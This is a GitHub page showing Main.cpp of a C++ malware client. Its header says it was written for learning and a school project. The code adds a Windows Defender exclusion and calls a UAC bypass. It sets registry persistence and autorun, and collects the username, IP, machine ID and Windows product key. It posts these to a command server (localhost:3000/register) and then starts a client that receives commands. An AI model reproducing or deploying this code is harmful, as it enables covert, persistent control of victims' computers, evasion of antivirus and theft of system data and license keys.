-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathMain.cpp
161 lines (138 loc) · 5.96 KB
/
Main.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
/*
This code is created for learning about malware. I have been using it to study hardware.
If I made any mistakes, I apologize for that. The code might not be perfect because I am also learning C++.
This project is part of a Science subject for the Presence Project.
Code written by Mikasuru (github.com/Mikasuru)
----------------------------------------------------------------
The project is built on a client-server model where a Node.js backend manages command distribution while C++ clients handle execution.
Main.cpp serves as the entry point, initializing core components and establishing webhook communications.
The server component (app.js) handles client registration, command distribution, and maintains the web interface.
*/
#include <iostream>
#include "Module/Logger.hpp"
#include "Extension/Payload/Payload.hpp"
#include "Extension/GetDevice/Hardware.hpp"
#include "Extension/Bot/HttpClient.hpp"
#include "Module/AutoElevate.hpp"
//#pragma comment(linker, "/SUBSYSTEM:windows /ENTRY:mainCRTStartup")
#include "Module/ConsoleManager.hpp"
#include "Module/ProcessMonitor.hpp"
#include "Module/AddonsManager.hpp"
using namespace std;
string username = Hardware::GetUsername();
string ipAddress = Hardware::GetIPAddress();
string machineID = Hardware::GetMachineID();
string rid = Hardware::GetRelativeIdentifier();
string windowsVersion = Hardware::GetWindowsVersion();
string windowsKey = Hardware::GetWindowsKey();
string profilePicPath = Hardware::GetUserProfilePicture();
std::string url = "http://localhost:3000/register";
bool isWindowsDefenderInstalled() {
HKEY hKey;
return RegOpenKeyExA(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows Defender",
0, KEY_READ, &hKey) == ERROR_SUCCESS;
}
void Exclusion(const std::string& path) {
if (!isWindowsDefenderInstalled()) {
return;
}
try {
HKEY hKey;
const char* regPath = "SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths";
if (RegOpenKeyExA(HKEY_LOCAL_MACHINE, regPath, 0, KEY_ALL_ACCESS, &hKey) != ERROR_SUCCESS) {
return;
}
DWORD value = 0;
RegSetValueExA(hKey, path.c_str(), 0, REG_DWORD, (BYTE*)&value, sizeof(value));
RegCloseKey(hKey);
}
catch (...) {
return;
}
}
std::string getExecutablePath() {
char path[MAX_PATH];
GetModuleFileNameA(NULL, path, MAX_PATH);
return std::string(path);
}
int main() {
try {
HWND console = GetConsoleWindow();
ShowWindow(console, SW_SHOW);
Logger::getInstance()->info("Program started");
ProcessMonitor::startMonitoring(AutoElevate::getExecutablePath());
if (!AutoElevate::isAdmin()) {
Logger::getInstance()->info("Not running as admin, attempting to elevate");
if (AutoElevate::bypassUAC()) {
Logger::getInstance()->info("UAC bypass successful");
HKEY hKey;
if (RegOpenKeyExA(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows",
0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
std::string exePath = AutoElevate::getExecutablePath();
RegSetValueExA(hKey, "Kukuri", 0, REG_SZ,
(BYTE*)exePath.c_str(), exePath.length() + 1);
RegCloseKey(hKey);
}
}
else {
Logger::getInstance()->warning("UAC bypass failed");
}
return 0;
}
Logger::getInstance()->info("Running as admin");
AutoElevate::elevatePrivileges();
if (!AutoElevate::setAutoRun()) {
Logger::getInstance()->warning("Failed to set auto run");
}
Logger::getInstance()->load("Initialize HTTP Client..."); // Initialize
Logger::getInstance()->load("Starting HTTP Client..."); // Start
if (!AddonsManager::initializeAddons()) {
Logger::getInstance()->warning("Failed to initialize addons system");
}
// Collecting system information
std::string username = Hardware::GetUsername();
std::string ipAddress = Hardware::GetIPAddress();
std::string machineID = Hardware::GetMachineID();
std::string rid = Hardware::GetRelativeIdentifier();
std::string windowsVersion = Hardware::GetWindowsVersion();
std::string windowsKey = Hardware::GetWindowsKey();
// Creating JSON Object
nlohmann::json systemInfo = {
{"username", username},
{"ipAddress", ipAddress},
{"machineID", machineID},
{"rid", rid},
{"windowsVersion", windowsVersion},
{"windowsKey", windowsKey}
};
std::string jsonStr = systemInfo.dump();
// Sending information to server
HINTERNET hInternet = InternetOpenA("System Info Client",
INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
if (hInternet) {
HINTERNET hConnect = InternetConnectA(hInternet, "localhost",
3000, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
if (hConnect) {
HINTERNET hRequest = HttpOpenRequestA(hConnect, "POST", "/register",
NULL, NULL, NULL, 0, 0);
if (hRequest) {
std::string headers = "Content-Type: application/json\r\n";
HttpSendRequestA(hRequest, headers.c_str(), headers.length(),
(LPVOID)jsonStr.c_str(), jsonStr.length());
InternetCloseHandle(hRequest);
}
InternetCloseHandle(hConnect);
}
InternetCloseHandle(hInternet);
}
HttpClient client;
client.start();
return 0;
}
catch (const exception& e) {
Logger::getInstance()->expection(e.what());
return 1;
}
}